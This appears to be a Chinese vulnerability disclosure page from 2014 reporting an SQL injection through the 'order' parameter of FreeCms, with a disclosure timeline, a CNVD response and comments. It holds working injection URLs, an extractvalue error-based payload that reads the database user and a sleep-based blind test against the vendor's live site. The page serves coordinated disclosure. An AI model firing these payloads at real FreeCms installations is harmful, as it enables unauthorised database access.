漏洞概要
关注数(24)
关注此漏洞
漏洞标题:FreeCms通杀SQL注射漏洞
提交时间:2014-06-19 12:08
修复时间:2014-09-17 12:10
公开时间:2014-09-17 12:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-06-19: 细节已通知厂商并且等待厂商处理中
2014-06-23: 厂商已经确认,细节仅向厂商公开
2014-06-26: 细节向第三方安全合作伙伴开放
2014-08-17: 细节向核心白帽子及相关领域专家公开
2014-08-27: 细节向普通白帽子公开
2014-09-06: 细节向实习白帽子公开
2014-09-17: 细节向公众公开
简要描述:
公司最近javaee有业务只有提起手枪公关了,深得园长天天炫斗真传。
详细说明:
order注射不只这一处,用到order的基本都存在比如CommentAction里也是类似的注入点,这里就只写一处啦。
免费版跟商业版都存在,只是商业版没有_list后缀,官方关闭了调试盲注。
0x00
0x01
先注册一个用户
http://localhost:8080/JAVAEE/register.jsp
然后访问
http://localhost:8080/JAVAEE/member/creditlog_list.do?order=extractvalue(1,concat(0x7C,(select user()),0x7C))
官方关闭了调试,用sleep测试了下却是存在,只是映射的名称少了_list
http://www.freeteam.cn/member/creditlog.do?order=sleep(10)
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2014-06-23 22:30
厂商回复:
CNVD确认所述漏洞原理分析,并进行实例复现有多个政府网站受影响,已经由CNVD直接联系软件生产厂商处置,电话至***,将通报发送至freeteam 邮箱中处置
最新状态:
暂无
漏洞评价:
评论
-
2014-06-19 12:35 |
PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)
-
2014-06-19 16:14 |
传说online ( 实习白帽子 | Rank:75 漏洞数:17 | hack.com)
-
2014-06-19 16:15 |
Phale ( 路人 | Rank:16 漏洞数:4 | 就是要一直走下去。)
-
2014-06-26 11:03 |
小学生 ( 实习白帽子 | Rank:40 漏洞数:1 | 我是小学生)
-
2014-09-20 21:26 |
Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
-
2015-08-12 16:53 |
BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)